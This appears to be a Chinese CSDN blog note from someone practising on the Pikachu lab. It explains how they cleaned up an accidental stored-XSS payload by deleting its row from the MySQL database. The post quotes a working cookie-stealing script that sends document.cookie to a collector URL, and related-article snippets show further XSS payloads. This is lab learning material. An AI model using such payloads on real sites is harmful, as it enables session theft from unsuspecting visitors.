存储型XSS清除方法

最新推荐文章于 2024-09-11 11:56:23 发布
最新推荐文章于 2024-09-11 11:56:23 发布
阅读量2.1k 收藏 6
点赞数 5
分类专栏: 笔记 渗透 pikachu 文章标签: 数据库 cookie mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339832/article/details/117623519
版权
渗透 同时被 3 个专栏收录
39 篇文章 2 订阅
订阅专栏
笔记
25 篇文章 0 订阅
订阅专栏
pikachu
14 篇文章 0 订阅
订阅专栏
本文讲述了作者在进行XSS实验时误将payload输入到存储型XSS中,导致每次访问页面都会触发跳转。存储型XSS的危害在于它将恶意代码永久保存在数据库中,影响所有访问者。为解决问题,作者进入数据库删除了payload。文章强调了存储型XSS的严重性,并提供了清除方法。
摘要由CSDN通过智能技术生成

今天也是被自己气哭的一天

今天做XSS盗取cookie实验

<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

就是用这个罪恶的payload

我眼花之下把他输入了存储型的XSS里:(

导致我一进去存储型就给我跳转到首页

刚开始我以为被攻击了,查看源代码发现居然插入了我的payload

解决办法:

打开mysql数据库

use pikachu

show tables

select * from message 会看到你插入的payload

delete from message where id=87 删掉他

这就好了

存储型XSS会把键入的信息永久保存在数据库里

可见这种存储型的xss的危害是非常大的,因为它被存储到了后台数据库,每一个打开这个页面的用户都会因此而“中招”,这造成的是一种持久性的危害。

玉米同学
关注
专栏目录
php实现XSS安全过滤的方法
10-23
6. 检测和防御:根据XSS攻击的类存储XSS、反射XSS、DOMXSS),设计相应的检测和防御机制。针对不同类XSS攻击采用不同的过滤策略。 7. 常用的XSS攻击向量:在开发过滤函数时,需要特别注意那些常见的...
xss php 转义_php 过滤存储XSS攻击
weixin_35762215的博客
03-09 174
最近做的项目被测试测出了存在存储XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)>也做了一些XSS过滤,但是不全,有从网上找了一些,弄了一个简单粗暴的;后台接收 input 框字符串内容,存在被攻击,便整理了一个比较粗暴的方法//过滤存储XSS攻击//过滤存储XSS攻击public function safe_filter(&...
DVWA靶机-存储XSS漏洞(Stored)
weixin_43726831的博客
11-25 4840
DVWA靶机-存储XSS漏洞(Stored) 前章: DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) DVWA靶机-存储X...
存储XSS漏洞
最新发布
韩云川的博客
09-11 727
存储XSS攻击是一种常见的网络攻击,也称为持久XSS攻击。与反射XSS攻击不同,存储XSS攻击将恶意代码存储在服务器端或数据库,当其他用户访问该网页时,恶意代码会被执行,导致用户的信息被窃取或造成其他安全问题。存储XSS攻击的原理是利用网页的输入和输出漏洞,将恶意代码插入到网页。当用户访问该网页时,恶意代码会被执行,并窃取用户的浏览器信息、Cookie等敏感数据。这些数据可以被攻击者用来进行更深入的攻击,例如身份盗用、钓鱼攻击等。存储XSS攻击的危害非常严重。
【web-攻击用户】(9.1.5)查找并利用XSS漏洞--存储
08-27 745
【查找并利用XSS漏洞】存储
pikachu之XSS(初学者总结)
av11566的博客
05-09 1323
目录 1.反射XSS(get) 2.反射XSS(post) 3.存储xss DOMXSS DOMxss-x xss之盲打 XSS之过滤 xss之htmlspecialchars XSS之href XSS-js输出 1.反射XSS(get) 获取cookie '><script>alert(document.cookie)</script> 根据提示先输入一个kobe试试,输入框有长度限制先改个大的(多长的脚本也不怕了) ..
pikachu-XSS
koala_king的博客
01-16 245
pikachu
payload的使 常用xss_XSS Payload深入分析整理
weixin_39567870的博客
12-20 595
几种加载XSS Payload的不常见标签众所周知,一种调用JavaScript的方法就是在元素类上使用事件处理器(Event Handler),通常的一种方法类似:这是一种使用无效src属性来触发 onerror 事件处理器(onerror event handler)的方法,当然,其包含了一个alert跳出框的xss payload,如下alert(1):由于过度使用img标签和onerr...
SpringBoot整合XSS.zip
04-30
XSS攻击通常分为反射存储和DOM三种类。 2. **防御XSS**:防御XSS攻击的主要手段是过滤、编码和验证输入。SpringBoot可以通过集成XssFilter来实现这一目标。XssFilter可以在每个HTTP请求处理之前对请求...
Web安全之XSS攻击与防御小结
10-17
存储XSS则更为严重,因为恶意脚本被永久地存储在服务器上,任何访问该页面的用户都可能遭受攻击,无需再次提交XSS代码。 针对XSS攻击,开发者可以采取一系列防御措施。首先,编码是最基础的防护手段,对用户...
xss跨站脚本攻击与预防
11-04
XSS攻击的类主要包括三种:反射XSS存储XSS和DOMXSS。反射XSS是通过诱使用户点击含有恶意脚本的链接,然后在当前页面上执行;存储XSS则更为严重,因为恶意脚本被存储在服务器上,任何访问该页面的用户...
xss跨站脚本攻击详解
06-08
- **定义**:也被称为存储XSS,相较于反射更加危险。 - **特点**:恶意脚本被存储在服务器端,如数据库,当其他用户访问含有这些恶意脚本的页面时,这些脚本会被加载并执行。 - **示例**:在论坛的发帖或评论...
网站遭遇XSS注入如何排查及解决
weixin_54232686的博客
05-04 1352
预防XSS注入及解决
Dvwa之存储XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-19 2056
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)
XSS注入方式和逃避XSS过滤的常用方法(整理)
weixin_34050427的博客
09-16 786
(转自黑吧安全网http://www.myhack58.com/) web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过滤的解决办法,php一般会使用htmlspecialchars或者html...
Web安全笔记:XSS跨站脚本
ZTao-z的博客
11-17 413
Web安全:XSS跨站脚本
如何清理接口测试后的测试数据
软件自动化测试技术交流、资源分享
11-14 94
这是最基本的方法,即手动删除或重置测试数据。您可以通过访问数据库、控制台或者其他测试环境来删除相关的测试数据。这种方法适用于简单的测试场景,但对于复杂的测试环境可能不够高效。
pikachu练习——XSS
haoaaao的博客
01-22 1014
/**** XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出到前端的内容进行适当转义; 一般XSS可以分为如下几种常见类: 1.反射性XSS; ...
Pikachu之XSS
weixin_48621644的博客
10-14 3172
小羊学安全 任重而道远~
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值